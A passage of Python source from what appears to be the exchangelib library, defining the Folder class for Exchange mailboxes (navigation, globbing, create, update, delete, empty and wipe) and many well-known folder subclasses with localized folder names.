if parent.root != self.root:
raise ValueError("'parent.root' must match 'root'")
else:
self.root = parent.root
if 'parent_folder_id' in kwargs:
if parent.id != kwargs['parent_folder_id']:
raise ValueError("'parent_folder_id' must match 'parent' ID")
kwargs['parent_folder_id'] = ParentFolderId(id=parent.id, changekey=parent.changekey)
if 'folder_id' in kwargs:
warnings.warn("The 'folder_id' attribute is deprecated. Use 'id' instead.", PendingDeprecationWarning)
kwargs['id'] = kwargs.pop('folder_id')
super(Folder, self).__init__(**kwargs)
@property
def folder_id(self):
warnings.warn("The 'folder_id' attribute is deprecated. Use 'id' instead.", PendingDeprecationWarning)
return self.id
@folder_id.setter
def folder_id(self, value):
warnings.warn("The 'folder_id' attribute is deprecated. Use 'id' instead.", PendingDeprecationWarning)
self.id = value
@classmethod
def get_field_by_fieldname(cls, fieldname):
if fieldname == 'folder_id':
warnings.warn("The 'folder_id' attribute is deprecated. Use 'id' instead.", PendingDeprecationWarning)
fieldname = 'id'
return super(Folder, cls).get_field_by_fieldname(fieldname)
@property
def is_deleteable(self):
return not self.is_distinguished
def clean(self, version=None):
# pylint: disable=access-member-before-definition
super(Folder, self).clean(version=version)
if self.root and not isinstance(self.root, RootOfHierarchy):
raise ValueError("'root' %r must be a RootOfHierarchy instance" % self.root)
# Set a default folder class for new folders. A folder class cannot be changed after saving.
if self.id is None and self.folder_class is None:
self.folder_class = self.CONTAINER_CLASS
@property
def parent(self):
if not self.parent_folder_id:
return None
if self.parent_folder_id.id == self.id:
# Some folders have a parent that references itself. Avoid circular references here
return None
return self.root.get_folder(self.parent_folder_id.id)
@parent.setter
def parent(self, value):
if value is None:
self.parent_folder_id = None
else:
if not isinstance(value, Folder):
raise ValueError("'value' %r must be a Folder instance" % value)
self.root = value.root
self.parent_folder_id = ParentFolderId(id=value.id, changekey=value.changekey)
@property
def children(self):
# It's dangerous to return a generator here because we may then call methods on a child that result in the
# cache being updated while it's iterated.
return FolderCollection(account=self.root.account, folders=self.root.get_children(self))
@property
def parts(self):
parts = [self]
f = self.parent
while f:
parts.insert(0, f)
f = f.parent
return parts
@property
def absolute(self):
return ''.join('/%s' % p.name for p in self.parts)
def _walk(self):
for c in self.children:
yield c
for f in c.walk():
yield f
def walk(self):
return FolderCollection(account=self.root.account, folders=self._walk())
def _glob(self, pattern):
split_pattern = pattern.rsplit('/', 1)
head, tail = (split_pattern[0], None) if len(split_pattern) == 1 else split_pattern
if head == '':
# We got an absolute path. Restart globbing at root
for f in self.root.glob(tail or '*'):
yield f
elif head == '..':
# Relative path with reference to parent. Restart globbing at parent
if not self.parent:
raise ValueError('Already at top')
for f in self.parent.glob(tail or '*'):
yield f
elif head == '**':
# Match anything here or in any subfolder at arbitrary depth
for c in self.walk():
if fnmatch(c.name, tail or '*'):
yield c
else:
# Regular pattern
for c in self.children:
if not fnmatch(c.name, head):
continue
if tail is None:
yield c
continue
for f in c.glob(tail):
yield f
def glob(self, pattern):
return FolderCollection(account=self.root.account, folders=self._glob(pattern))
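# Pattern sketch (illustrative; 'my_account' and the folder names are placeholders):
#   my_account.root.glob('*')           # direct children of the root
#   my_account.inbox.glob('../*')       # siblings of the inbox (via the parent)
#   my_account.root.glob('**/Foo')      # folders named 'Foo' at any depth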
def tree(self):
"""
Returns a string representation of the folder structure of this folder. Example:
root
├── inbox
│ └── todos
└── archive
├── Last Job
├── exchangelib issues
└── Mom
"""
tree = '%s\n' % self.name
children = list(self.children)
for i, c in enumerate(sorted(children, key=attrgetter('name')), start=1):
nodes = c.tree().split('\n')
for j, node in enumerate(nodes, start=1):
if i != len(children) and j == 1:
# Not the last child, but the first node, which is the name of the child
tree += '├── %s\n' % node
elif i != len(children) and j > 1:
# Not the last child, and not name of child
tree += '│ %s\n' % node
elif i == len(children) and j == 1:
# The last child, and the first node, which is the name of the child
tree += '└── %s\n' % node
else: # Last child, and not name of child
tree += ' %s\n' % node
return tree.strip()
@classmethod
def supports_version(cls, version):
# 'version' is a Version instance, for convenience by callers
if not cls.supported_from or not version:
return True
return version.build >= cls.supported_from
@property
def has_distinguished_name(self):
return self.name and self.DISTINGUISHED_FOLDER_ID and self.name.lower() == self.DISTINGUISHED_FOLDER_ID.lower()
@classmethod
def localized_names(cls, locale):
# Return localized names for a specific locale. If no locale-specific names exist, return the default names,
# if any.
return tuple(s.lower() for s in cls.LOCALIZED_NAMES.get(locale, cls.LOCALIZED_NAMES.get(None, [])))
@staticmethod
def folder_cls_from_container_class(container_class):
"""Returns a reasonable folder class given a container class, e.g. 'IPF.Note'. Don't iterate WELLKNOWN_FOLDERS
because many folder classes have the same CONTAINER_CLASS.
"""
for folder_cls in (
Messages, Tasks, Calendar, ConversationSettings, Contacts, GALContacts, Reminders, RecipientCache,
RSSFeeds):
if folder_cls.CONTAINER_CLASS == container_class:
return folder_cls
raise KeyError()
@classmethod
def item_model_from_tag(cls, tag):
try:
return cls.ITEM_MODEL_MAP[tag]
except KeyError:
raise ValueError('Item type %s was unexpected in a %s folder' % (tag, cls.__name__))
@classmethod
def allowed_item_fields(cls, version):
# Return non-ID fields of all item classes allowed in this folder type
fields = set()
for item_model in cls.supported_item_models:
fields.update(
set(item_model.supported_fields(version=version))
)
return fields
def validate_item_field(self, field):
# Takes a fieldname, Field or FieldPath object pointing to an item field, and checks that it is valid
# for the item types supported by this folder.
if field == 'item_id':
warnings.warn("The 'item_id' attribute is deprecated. Use 'id' instead.", PendingDeprecationWarning)
field = 'id'
version = self.root.account.version if self.root and self.root.account else None
# For each field, check if the field is valid for any of the item models supported by this folder
for item_model in self.supported_item_models:
try:
item_model.validate_field(field=field, version=version)
break
except InvalidField:
continue
else:
raise InvalidField("%r is not a valid field on %s" % (field, self.supported_item_models))
def normalize_fields(self, fields):
# Takes a list of fieldnames, Field or FieldPath objects pointing to item fields. Turns them into FieldPath
# objects and adds internal timezone fields if necessary. Assume fields are already validated.
from .version import EXCHANGE_2010
fields = list(fields)
has_start, has_end = False, False
for i, field_path in enumerate(fields):
if field_path == 'item_id':
warnings.warn("The 'item_id' attribute is deprecated. Use 'id' instead.", PendingDeprecationWarning)
field_path = 'id'
# Allow both Field and FieldPath instances and string field paths as input
if isinstance(field_path, string_types):
field_path = FieldPath.from_string(field_path=field_path, folder=self)
fields[i] = field_path
elif isinstance(field_path, Field):
field_path = FieldPath(field=field_path)
fields[i] = field_path
if not isinstance(field_path, FieldPath):
raise ValueError("Field %r must be a string or FieldPath object" % field_path)
if field_path.field.name == 'start':
has_start = True
elif field_path.field.name == 'end':
has_end = True
# For CalendarItem items, we want to inject internal timezone fields. See also CalendarItem.clean()
if CalendarItem in self.supported_item_models:
meeting_tz_field, start_tz_field, end_tz_field = CalendarItem.timezone_fields()
if self.root.account.version.build < EXCHANGE_2010:
if has_start or has_end:
fields.append(FieldPath(field=meeting_tz_field))
else:
if has_start:
fields.append(FieldPath(field=start_tz_field))
if has_end:
fields.append(FieldPath(field=end_tz_field))
return fields
@classmethod
def get_item_field_by_fieldname(cls, fieldname):
for item_model in cls.supported_item_models:
try:
return item_model.get_field_by_fieldname(fieldname)
except InvalidField:
pass
raise InvalidField("%r is not a valid field name on %s" % (fieldname, cls.supported_item_models))
def get(self, *args, **kwargs):
return FolderCollection(account=self.root.account, folders=[self]).get(*args, **kwargs)
def all(self):
return FolderCollection(account=self.root.account, folders=[self]).all()
def none(self):
return FolderCollection(account=self.root.account, folders=[self]).none()
def filter(self, *args, **kwargs):
return FolderCollection(account=self.root.account, folders=[self]).filter(*args, **kwargs)
def exclude(self, *args, **kwargs):
return FolderCollection(account=self.root.account, folders=[self]).exclude(*args, **kwargs)
def people(self):
return QuerySet(
folder_collection=FolderCollection(account=self.root.account, folders=[self]),
request_type=QuerySet.PERSONA,
)
def find_people(self, q, shape=ID_ONLY, depth=SHALLOW, additional_fields=None, order_fields=None, page_size=None,
max_items=None, offset=0):
"""
Private method to call the FindPeople service
:param q: a Q instance containing any restrictions
:param shape: controls whether to return (id, changekey) tuples or Persona objects. If additional_fields is
non-null, we always return Persona objects.
:param depth: controls whether to return soft-deleted items or not.
:param additional_fields: the extra properties we want on the return objects. Default is no properties.
:param order_fields: the SortOrder fields, if any
:param page_size: the requested number of items per page
:param max_items: the max number of items to return
:param offset: the offset relative to the first item in the item collection
:return: a generator for the returned personas
"""
if shape not in SHAPE_CHOICES:
raise ValueError("'shape' %s must be one of %s" % (shape, SHAPE_CHOICES))
if depth not in ITEM_TRAVERSAL_CHOICES:
raise ValueError("'depth' %s must be one of %s" % (depth, ITEM_TRAVERSAL_CHOICES))
if additional_fields:
for f in additional_fields:
Persona.validate_field(field=f, version=self.root.account.version)
if f.field.is_complex:
raise ValueError("find_people() does not support field '%s'" % f.field.name)
# Build up any restrictions
if q.is_empty():
restriction = None
query_string = None
elif q.query_string:
restriction = None
query_string = Restriction(q, folders=[self], applies_to=Restriction.ITEMS)
else:
restriction = Restriction(q, folders=[self], applies_to=Restriction.ITEMS)
query_string = None
personas = FindPeople(account=self.root.account, chunk_size=page_size).call(
folder=self,
additional_fields=additional_fields,
restriction=restriction,
order_fields=order_fields,
shape=shape,
query_string=query_string,
depth=depth,
max_items=max_items,
offset=offset,
)
for p in personas:
if isinstance(p, Exception):
raise p
yield p
def bulk_create(self, items, *args, **kwargs):
return self.root.account.bulk_create(folder=self, items=items, *args, **kwargs)
def save(self, update_fields=None):
if self.id is None:
# New folder
if update_fields:
raise ValueError("'update_fields' is only valid for updates")
res = list(CreateFolder(account=self.root.account).call(parent_folder=self.parent, folders=[self]))
if len(res) != 1:
raise ValueError('Expected result length 1, but got %s' % res)
if isinstance(res[0], Exception):
raise res[0]
self.id, self.changekey = res[0].id, res[0].changekey
self.root.add_folder(self) # Add this folder to the cache
return self
# Update folder
if not update_fields:
# The fields to update was not specified explicitly. Update all fields where update is possible
update_fields = []
for f in self.supported_fields(version=self.root.account.version):
if f.is_read_only:
# These cannot be changed
continue
if f.is_required or f.is_required_after_save:
if getattr(self, f.name) is None or (f.is_list and not getattr(self, f.name)):
# These are required and cannot be deleted
continue
update_fields.append(f.name)
res = list(UpdateFolder(account=self.root.account).call(folders=[(self, update_fields)]))
if len(res) != 1:
raise ValueError('Expected result length 1, but got %s' % res)
if isinstance(res[0], Exception):
raise res[0]
folder_id, changekey = res[0].id, res[0].changekey
if self.id != folder_id:
raise ValueError('ID mismatch')
# Don't check changekey value. It may not change on no-op updates
self.changekey = changekey
self.root.update_folder(self) # Update the folder in the cache
return None
def delete(self, delete_type=HARD_DELETE):
if delete_type not in DELETE_TYPE_CHOICES:
raise ValueError("'delete_type' %s must be one of %s" % (delete_type, DELETE_TYPE_CHOICES))
res = list(DeleteFolder(account=self.root.account).call(folders=[self], delete_type=delete_type))
if len(res) != 1:
raise ValueError('Expected result length 1, but got %s' % res)
if isinstance(res[0], Exception):
raise res[0]
self.root.remove_folder(self) # Remove the updated folder from the cache
self.id, self.changekey = None, None
def empty(self, delete_type=HARD_DELETE, delete_sub_folders=False):
if delete_type not in DELETE_TYPE_CHOICES:
raise ValueError("'delete_type' %s must be one of %s" % (delete_type, DELETE_TYPE_CHOICES))
res = list(EmptyFolder(account=self.root.account).call(folders=[self], delete_type=delete_type,
delete_sub_folders=delete_sub_folders))
if len(res) != 1:
raise ValueError('Expected result length 1, but got %s' % res)
if isinstance(res[0], Exception):
raise res[0]
if delete_sub_folders:
# We don't know exactly what was deleted, so invalidate the entire folder cache to be safe
self.root.clear_cache()
def wipe(self):
# Recursively deletes all items in this folder, and all subfolders and their content. Attempts to protect
# distinguished folders from being deleted. Use with caution!
log.warning('Wiping %s', self)
has_distinguished_subfolders = any(f.is_distinguished for f in self.children)
try:
if has_distinguished_subfolders:
self.empty(delete_sub_folders=False)
else:
self.empty(delete_sub_folders=True)
except (ErrorAccessDenied, ErrorCannotEmptyFolder):
try:
if has_distinguished_subfolders:
raise # We already tried this
self.empty(delete_sub_folders=False)
except (ErrorAccessDenied, ErrorCannotEmptyFolder):
log.warning('Not allowed to empty %s. Trying to delete items instead', self)
try:
self.all().delete()
except (ErrorAccessDenied, ErrorCannotDeleteObject):
log.warning('Not allowed to delete items in %s', self)
for f in self.children:
f.wipe()
# Remove non-distinguished children that are empty and have no subfolders
if f.is_deleteable and not f.children:
log.warning('Deleting folder %s', f)
try:
f.delete()
except ErrorDeleteDistinguishedFolder:
log.warning('Tried to delete a distinguished folder (%s)', f)
def test_access(self):
"""
Does a simple FindItem to test (read) access to the folder. Maybe the account doesn't exist, maybe the
service user doesn't have access to the calendar. This will throw the most common errors.
"""
list(self.filter(subject='DUMMY').values_list('subject'))
return True
@classmethod
def from_xml(cls, elem, root):
# fld_type = re.sub('{.*}', '', elem.tag)
fld_id_elem = elem.find(FolderId.response_tag())
fld_id = fld_id_elem.get(FolderId.ID_ATTR)
changekey = fld_id_elem.get(FolderId.CHANGEKEY_ATTR)
kwargs = {f.name: f.from_xml(elem=elem, account=root.account) for f in cls.supported_fields()}
if not kwargs['name']:
# Some folders are returned with an empty 'DisplayName' element. Assign a default name to them.
# TODO: Only do this if we actually requested the 'name' field.
kwargs['name'] = cls.DISTINGUISHED_FOLDER_ID
cls._clear(elem)
folder_cls = cls
if cls == Folder:
# We were called on the generic Folder class. Try to find a more specific class to return objects as.
#
# The "FolderClass" element value is the only indication we have in the FindFolder response of which
# folder class we should create the folder with. And many folders share the same 'FolderClass' value, e.g.
# Inbox and DeletedItems. We want to distinguish between these because otherwise we can't locate the right
# folders types for e.g. Account.inbox and Account.trash.
#
# We should be able to just use the name, but apparently default folder names can be renamed to a set of
# localized names using a PowerShell command:
# https://technet.microsoft.com/da-dk/library/dd351103(v=exchg.160).aspx
#
# Instead, search for a folder class using the localized name. If none are found, fall back to getting the
# folder class by the "FolderClass" value.
#
# The returned XML may contain neither folder class nor name. In that case, we default to the generic Folder class.
if kwargs['name']:
try:
# TODO: fld_class.LOCALIZED_NAMES is most definitely neither complete nor authoritative
folder_cls = root.folder_cls_from_folder_name(folder_name=kwargs['name'],
locale=root.account.locale)
log.debug('Folder class %s matches localized folder name %s', folder_cls, kwargs['name'])
except KeyError:
pass
if kwargs['folder_class'] and folder_cls == Folder:
try:
folder_cls = cls.folder_cls_from_container_class(container_class=kwargs['folder_class'])
log.debug('Folder class %s matches container class %s (%s)', folder_cls, kwargs['folder_class'],
kwargs['name'])
except KeyError:
pass
if folder_cls == Folder:
log.debug('Fallback to class Folder (folder_class %s, name %s)', kwargs['folder_class'], kwargs['name'])
return folder_cls(root=root, id=fld_id, changekey=changekey, **kwargs)
def to_xml(self, version):
if self.is_distinguished:
# Don't add the changekey here. When modifying folder content, we usually don't care if others have changed
# the folder content since we fetched the changekey.
if self.root and self.root.account:
return DistinguishedFolderId(
id=self.DISTINGUISHED_FOLDER_ID,
mailbox=Mailbox(email_address=self.root.account.primary_smtp_address)
).to_xml(version=version)
return DistinguishedFolderId(id=self.DISTINGUISHED_FOLDER_ID).to_xml(version=version)
if self.id:
return FolderId(id=self.id, changekey=self.changekey).to_xml(version=version)
return super(Folder, self).to_xml(version=version)
@classmethod
def supported_fields(cls, version=None):
return tuple(f for f in cls.FIELDS if f.name not in ('id', 'changekey') and f.supports_version(version))
@classmethod
def get_distinguished(cls, root):
"""Gets the distinguished folder for this folder class"""
if not cls.DISTINGUISHED_FOLDER_ID:
raise ValueError('Class %s must have a DISTINGUISHED_FOLDER_ID value' % cls)
folders = list(FolderCollection(
account=root.account,
folders=[cls(root=root, name=cls.DISTINGUISHED_FOLDER_ID, is_distinguished=True)]
).get_folders()
)
if not folders:
raise ErrorFolderNotFound('Could not find distinguished folder %s' % cls.DISTINGUISHED_FOLDER_ID)
if len(folders) != 1:
raise ValueError('Expected result length 1, but got %s' % folders)
folder = folders[0]
if isinstance(folder, Exception):
raise folder
if folder.__class__ != cls:
raise ValueError("Expected 'folder' %r to be a %s instance" % (folder, cls))
return folder
def refresh(self):
if not self.root:
raise ValueError('%s must have a root' % self.__class__.__name__)
if not self.id:
raise ValueError('%s must have an ID' % self.__class__.__name__)
folders = list(FolderCollection(account=self.root.account, folders=[self]).get_folders())
if not folders:
raise ErrorFolderNotFound('Folder %s disappeared' % self)
if len(folders) != 1:
raise ValueError('Expected result length 1, but got %s' % folders)
fresh_folder = folders[0]
if isinstance(fresh_folder, Exception):
raise fresh_folder
if self.id != fresh_folder.id:
raise ValueError('ID mismatch')
# Apparently, the changekey may get updated
for f in self.FIELDS:
setattr(self, f.name, getattr(fresh_folder, f.name))
def __floordiv__(self, other):
"""Same as __truediv__ but does not touch the folder cache.
This is useful if the folder hierarchy contains a huge number of folders and you don't want to fetch them all"""
if other == '..':
raise ValueError('Cannot get parent without a folder cache')
if other == '.':
return self
# Assume an exact match on the folder name in a shallow search will only return at most one folder
for f in FolderCollection(account=self.root.account, folders=[self]).find_folders(
q=Q(name=other), depth=SHALLOW
):
return f
raise ErrorFolderNotFound("No subfolder with name '%s'" % other)
def __truediv__(self, other):
# Support the some_folder / 'child_folder' / 'child_of_child_folder' navigation syntax
if other == '..':
if not self.parent:
raise ValueError('Already at top')
return self.parent
if other == '.':
return self
for c in self.children:
if c.name == other:
return c
raise ErrorFolderNotFound("No subfolder with name '%s'" % other)
if PY2:
# Python 2 requires __div__
__div__ = __truediv__
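# Navigation sketch for the '/' and '//' operators above (illustrative; 'my_account'
# and the folder names are placeholders):
#   todos = my_account.inbox / 'todos'     # child lookup via the folder cache
#   todos = my_account.inbox // 'todos'    # same lookup, but bypassing the cache
#   parent = my_account.inbox / '..'       # parent folder (requires the cache)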
def __repr__(self):
return self.__class__.__name__ + \
repr((self.root, self.name, self.total_count, self.unread_count, self.child_folder_count,
self.folder_class, self.id, self.changekey))
def __str__(self):
return '%s (%s)' % (self.__class__.__name__, self.name)
class Calendar(Folder):
"""
An interface for the Exchange calendar
"""
DISTINGUISHED_FOLDER_ID = 'calendar'
CONTAINER_CLASS = 'IPF.Appointment'
supported_item_models = (CalendarItem,)
LOCALIZED_NAMES = {
'da_DK': (u'Kalender',),
'de_DE': (u'Kalender',),
'en_US': (u'Calendar',),
'es_ES': (u'Calendario',),
'fr_CA': (u'Calendrier',),
'nl_NL': (u'Agenda',),
'ru_RU': (u'Календарь',),
'sv_SE': (u'Kalender',),
'zh_CN': (u'日历',),
}
def view(self, *args, **kwargs):
return FolderCollection(account=self.root.account, folders=[self]).view(*args, **kwargs)
class DeletedItems(Folder):
DISTINGUISHED_FOLDER_ID = 'deleteditems'
CONTAINER_CLASS = 'IPF.Note'
supported_item_models = ITEM_CLASSES
LOCALIZED_NAMES = {
'da_DK': (u'Slettet post',),
'de_DE': (u'Gelöschte Elemente',),
'en_US': (u'Deleted Items',),
'es_ES': (u'Elementos eliminados',),
'fr_CA': (u'Éléments supprimés',),
'nl_NL': (u'Verwijderde items',),
'ru_RU': (u'Удаленные',),
'sv_SE': (u'Borttaget',),
'zh_CN': (u'已删除邮件',),
}
class Messages(Folder):
CONTAINER_CLASS = 'IPF.Note'
supported_item_models = (Message, MeetingRequest, MeetingResponse, MeetingCancellation)
class Drafts(Messages):
DISTINGUISHED_FOLDER_ID = 'drafts'
LOCALIZED_NAMES = {
'da_DK': (u'Kladder',),
'de_DE': (u'Entwürfe',),
'en_US': (u'Drafts',),
'es_ES': (u'Borradores',),
'fr_CA': (u'Brouillons',),
'nl_NL': (u'Concepten',),
'ru_RU': (u'Черновики',),
'sv_SE': (u'Utkast',),
'zh_CN': (u'草稿',),
}
class Inbox(Messages):
DISTINGUISHED_FOLDER_ID = 'inbox'
LOCALIZED_NAMES = {
'da_DK': (u'Indbakke',),
'de_DE': (u'Posteingang',),
'en_US': (u'Inbox',),
'es_ES': (u'Bandeja de entrada',),
'fr_CA': (u'Boîte de réception',),
'nl_NL': (u'Postvak IN',),
'ru_RU': (u'Входящие',),
'sv_SE': (u'Inkorgen',),
'zh_CN': (u'收件箱',),
}
class Outbox(Messages):
DISTINGUISHED_FOLDER_ID = 'outbox'
LOCALIZED_NAMES = {
'da_DK': (u'Udbakke',),
'de_DE': (u'Postausgang',),
'en_US': (u'Outbox',),
'es_ES': (u'Bandeja de salida',),
'fr_CA': (u"Boîte d'envoi",),
'nl_NL': (u'Postvak UIT',),
'ru_RU': (u'Исходящие',),
'sv_SE': (u'Utkorgen',),
'zh_CN': (u'发件箱',),
}
class SentItems(Messages):
DISTINGUISHED_FOLDER_ID = 'sentitems'
LOCALIZED_NAMES = {
'da_DK': (u'Sendt post',),
'de_DE': (u'Gesendete Elemente',),
'en_US': (u'Sent Items',),
'es_ES': (u'Elementos enviados',),
'fr_CA': (u'Éléments envoyés',),
'nl_NL': (u'Verzonden items',),
'ru_RU': (u'Отправленные',),
'sv_SE': (u'Skickat',),
'zh_CN': (u'已发送邮件',),
}
class JunkEmail(Messages):
DISTINGUISHED_FOLDER_ID = 'junkemail'
LOCALIZED_NAMES = {
'da_DK': (u'Uønsket e-mail',),
'de_DE': (u'Junk-E-Mail',),
'en_US': (u'Junk E-mail',),
'es_ES': (u'Correo no deseado',),
'fr_CA': (u'Courrier indésirables',),
'nl_NL': (u'Ongewenste e-mail',),
'ru_RU': (u'Нежелательная почта',),
'sv_SE': (u'Skräppost',),
'zh_CN': (u'垃圾邮件',),
}
class Tasks(Folder):
DISTINGUISHED_FOLDER_ID = 'tasks'
CONTAINER_CLASS = 'IPF.Task'
supported_item_models = (Task,)
LOCALIZED_NAMES = {
'da_DK': (u'Opgaver',),
'de_DE': (u'Aufgaben',),
'en_US': (u'Tasks',),
'es_ES': (u'Tareas',),
'fr_CA': (u'Tâches',),
'nl_NL': (u'Taken',),
'ru_RU': (u'Задачи',),
'sv_SE': (u'Uppgifter',),
'zh_CN': (u'任务',),
}
class Contacts(Folder):
DISTINGUISHED_FOLDER_ID = 'contacts'
CONTAINER_CLASS = 'IPF.Contact'
supported_item_models = (Contact, DistributionList)
LOCALIZED_NAMES = {
'da_DK': (u'Kontaktpersoner',),
'de_DE': (u'Kontakte',),
'en_US': (u'Contacts',),
'es_ES': (u'Contactos',),
'fr_CA': (u'Contacts',),
'nl_NL': (u'Contactpersonen',),
'ru_RU': (u'Контакты',),
'sv_SE': (u'Kontakter',),
'zh_CN': (u'联系人',),
}
class WellknownFolder(Folder):
# Use this class until we have specific folder implementations
supported_item_models = ITEM_CLASSES
class AdminAuditLogs(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'adminauditlogs'
supported_from = EXCHANGE_2013
class ArchiveDeletedItems(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'archivedeleteditems'
supported_from = EXCHANGE_2010_SP1
class ArchiveInbox(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'archiveinbox'
supported_from = EXCHANGE_2013_SP1
class ArchiveMsgFolderRoot(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'archivemsgfolderroot'
supported_from = EXCHANGE_2010_SP1
class ArchiveRecoverableItemsDeletions(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'archiverecoverableitemsdeletions'
supported_from = EXCHANGE_2010_SP1
class ArchiveRecoverableItemsPurges(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'archiverecoverableitemspurges'
supported_from = EXCHANGE_2010_SP1
class ArchiveRecoverableItemsRoot(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'archiverecoverableitemsroot'
supported_from = EXCHANGE_2010_SP1
class ArchiveRecoverableItemsVersions(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'archiverecoverableitemsversions'
supported_from = EXCHANGE_2010_SP1
class Conflicts(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'conflicts'
supported_from = EXCHANGE_2013
class ConversationHistory(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'conversationhistory'
supported_from = EXCHANGE_2013
class Directory(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'directory'
supported_from = EXCHANGE_2013_SP1
class Favorites(WellknownFolder):
CONTAINER_CLASS = 'IPF.Note'
DISTINGUISHED_FOLDER_ID = 'favorites'
supported_from = EXCHANGE_2013
class IMContactList(WellknownFolder):
CONTAINER_CLASS = 'IPF.Contact.MOC.ImContactList'
DISTINGUISHED_FOLDER_ID = 'imcontactlist'
supported_from = EXCHANGE_2013
class Journal(WellknownFolder):
CONTAINER_CLASS = 'IPF.Journal'
DISTINGUISHED_FOLDER_ID = 'journal'
class LocalFailures(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'localfailures'
supported_from = EXCHANGE_2013
class MsgFolderRoot(WellknownFolder):
# Also known as the 'Top of Information Store' folder
DISTINGUISHED_FOLDER_ID = 'msgfolderroot'
LOCALIZED_NAMES = {
'zh_CN': (u'信息存储顶部',),
}
class MyContacts(WellknownFolder):
CONTAINER_CLASS = 'IPF.Note'
DISTINGUISHED_FOLDER_ID = 'mycontacts'
supported_from = EXCHANGE_2013
class Notes(WellknownFolder):
CONTAINER_CLASS = 'IPF.StickyNote'
DISTINGUISHED_FOLDER_ID = 'notes'
LOCALIZED_NAMES = {
'da_DK': (u'Noter',),
}
class PeopleConnect(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'peopleconnect'
supported_from = EXCHANGE_2013
class QuickContacts(WellknownFolder):
CONTAINER_CLASS = 'IPF.Contact.MOC.QuickContacts'
DISTINGUISHED_FOLDER_ID = 'quickcontacts'
supported_from = EXCHANGE_2013
class RecipientCache(Contacts):
DISTINGUISHED_FOLDER_ID = 'recipientcache'
CONTAINER_CLASS = 'IPF.Contact.RecipientCache'
supported_from = EXCHANGE_2013
LOCALIZED_NAMES = {}
class RecoverableItemsDeletions(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'recoverableitemsdeletions'
supported_from = EXCHANGE_2010_SP1
class RecoverableItemsPurges(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'recoverableitemspurges'
supported_from = EXCHANGE_2010_SP1
class RecoverableItemsRoot(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'recoverableitemsroot'
supported_from = EXCHANGE_2010_SP1
class RecoverableItemsVersions(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'recoverableitemsversions'
supported_from = EXCHANGE_2010_SP1
class SearchFolders(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'searchfolders'
class ServerFailures(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'serverfailures'
supported_from = EXCHANGE_2013
class SyncIssues(WellknownFolder):
CONTAINER_CLASS = 'IPF.Note'
DISTINGUISHED_FOLDER_ID = 'syncissues'
supported_from = EXCHANGE_2013
class ToDoSearch(WellknownFolder):
CONTAINER_CLASS = 'IPF.Task'
DISTINGUISHED_FOLDER_ID = 'todosearch'
supported_from = EXCHANGE_2013
LOCALIZED_NAMES = {
None: (u'To-Do Search',),
}
class VoiceMail(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'voicemail'
class NonDeleteableFolderMixin:
@property
def is_deleteable(self):
return False
class AllContacts(NonDeleteableFolderMixin, Contacts):
CONTAINER_CLASS = 'IPF.Note'
LOCALIZED_NAMES = {
None: (u'AllContacts',),
}
class AllItems(NonDeleteableFolderMixin, Folder):
CONTAINER_CLASS = 'IPF'
LOCALIZED_NAMES = {
None: (u'AllItems',),
}
class CalendarLogging(NonDeleteableFolderMixin, Folder):
LOCALIZED_NAMES = {
None: ('Calendar Logging',),
}
class CommonViews(NonDeleteableFolderMixin, Folder):
LOCALIZED_NAMES = {
None: ('Common Views',),
}
class ConversationSettings(NonDeleteableFolderMixin, Folder):
CONTAINER_CLASS = 'IPF.Configuration'
LOCALIZED_NAMES = {
'da_DK': (u'Indstillinger for samtalehandlinger',),
}
class DeferredAction(NonDeleteableFolderMixin, Folder):
LOCALIZED_NAMES = {
None: ('Deferred Action',),
}
class ExchangeSyncData(NonDeleteableFolderMixin, Folder):
LOCALIZED_NAMES = {
None: (u'ExchangeSyncData',),
}
class FreebusyData(NonDeleteableFolderMixin, Folder):
LOCALIZED_NAMES = {
None: (u'Freebusy Data',),
}
class Friends(NonDeleteableFolderMixin, Contacts):
CONTAINER_CLASS = 'IPF.Note'
LOCALIZED_NAMES = {
'de_DE': (u'Bekannte',),
}
class GALContacts(NonDeleteableFolderMixin, Contacts):
DISTINGUISHED_FOLDER_ID = None
CONTAINER_CLASS = 'IPF.Contact.GalContacts'
LOCALIZED_NAMES = {
None: ('GAL Contacts',),
}
class Location(NonDeleteableFolderMixin, Folder):
LOCALIZED_NAMES = {
None: (u'Location',),
}
class MailboxAssociations(NonDeleteableFolderMixin, Folder):
LOCALIZED_NAMES = {
None: (u'MailboxAssociations',),
}
class MyContactsExtended(NonDeleteableFolderMixin, Contacts):
CONTAINER_CLASS = 'IPF.Note'
LOCALIZED_NAMES = {
None: (u'MyContactsExtended',),
}
class ParkedMessages(NonDeleteableFolderMixin, Folder):
CONTAINER_CLASS = None
LOCALIZED_NAMES = {
None: (u'ParkedMessages',),
}
class Reminders(NonDeleteableFolderMixin, Folder):
CONTAINER_CLASS = 'Outlook.Reminder'
LOCALIZED_NAMES = {
'da_DK': (u'Påmindelser',),
}
class RSSFeeds(NonDeleteableFolderMixin, Folder):
CONTAINER_CLASS = 'IPF.Note.OutlookHomepage'
LOCALIZED_NAMES = {
None: (u'RSS Feeds',),
}
class Schedule(NonDeleteableFolderMixin, Folder):
LOCALIZED_NAMES = {
None: (u'Schedule',),
}
class Sharing(NonDeleteableFolderMixin, Folder):
CONTAINER_CLASS = 'IPF.Note'
LOCALIZED_NAMES = {
None: (u'Sharing',),
}
class Shortcuts(NonDeleteableFolderMixin, Folder):
LOCALIZED_NAMES = {
None: (u'Shortcuts',),
}
class SpoolerQueue(NonDeleteableFolderMixin, Folder):
LOCALIZED_NAMES = {
None: (u'Spooler Queue',),
}
